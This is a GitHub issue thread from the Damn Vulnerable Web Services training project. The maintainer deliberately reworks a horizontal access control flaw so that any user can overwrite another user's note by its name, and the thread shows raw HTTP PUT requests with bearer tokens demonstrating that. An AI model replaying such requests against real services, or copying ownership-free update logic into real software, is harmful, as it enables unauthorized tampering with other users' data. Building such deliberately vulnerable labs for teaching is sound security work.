search

snoopysecurity / dvws-node

Damn Vulnerable Web Services is a vulnerable application with a web service and an API that can be used to learn about webservices/API related vulnerabilities.
GNU General Public License v3.0
442 stars 173 forks source link

Horizontal access control #32

Closed halfluke closed 2 years ago

halfluke commented 2 years ago

Hi,

could you please check the horizontal access control below? "If you know the note ID (e.g. 1-8) and the note name, it is possible to change the content of the note. As such it is possible for any user to change the note content of any user. "

It seems to me that the note id is now an alphanumeric string (non-guessable?):

PUT /api/v2/notes/62e7002d0a5aba0032093dc5 HTTP/1.1 Host: dvws.local Content-Length: 29 Accept: application/json, text/plain, / Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjU5MzA4NTkzLCJleHAiOjE2NTk0ODEzOTMsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.sqGkIqO6EMfEe4j_snrmNgEE_XMt9gjCQQblro5zP5A User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://dvws.local Referer: http://dvws.local/notes.html Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close

{"name":"yo","body":"change"}

snoopysecurity commented 2 years ago

Hmmm I see what you mean. Indeed it was using the mongoid as a way to update and delete a note. I've made some changes, now if you note a note name, you will be able to change it as follows:

PUT /api/v2/notes/secret HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdDEiLCJwZXJtaXNzaW9ucyI6WyJ1c2VyOnJlYWQiLCJ1c2VyOndyaXRlIl0sImlhdCI6MTY1OTM5MTUxNCwiZXhwIjoxNjU5NTY0MzE0LCJpc3MiOiJodHRwczovL2dpdGh1Yi5jb20vc25vb3B5c2VjdXJpdHkifQ.fGvoYRtAbx76OimeXKl_NvYjitOFD3Paxu_K15KOUh0
Content-Type: application/json;charset=utf-8
Content-Length: 33
Origin: http://dvws.local
Connection: close
Referer: http://dvws.local/notes.html

{"name":"secret","body":"hacked"}

so secret belongs to a different user, and this will be updated. Ideally it should be the ID, but thats a little bit tedious with the current setup so I went with the note name. This change is in the latest version, thanks

halfluke commented 2 years ago

thanks :) Unrelated: I've noticed that with the latest commit now the note number starts from 10 instead of 0 ?

snoopysecurity commented 2 years ago

Hmmm are you sure @halfluke? maybe the mongodb you are using is from a previous dvws session you had

halfluke commented 2 years ago

true, I have recreated everything from scratch and now the very first note is number 0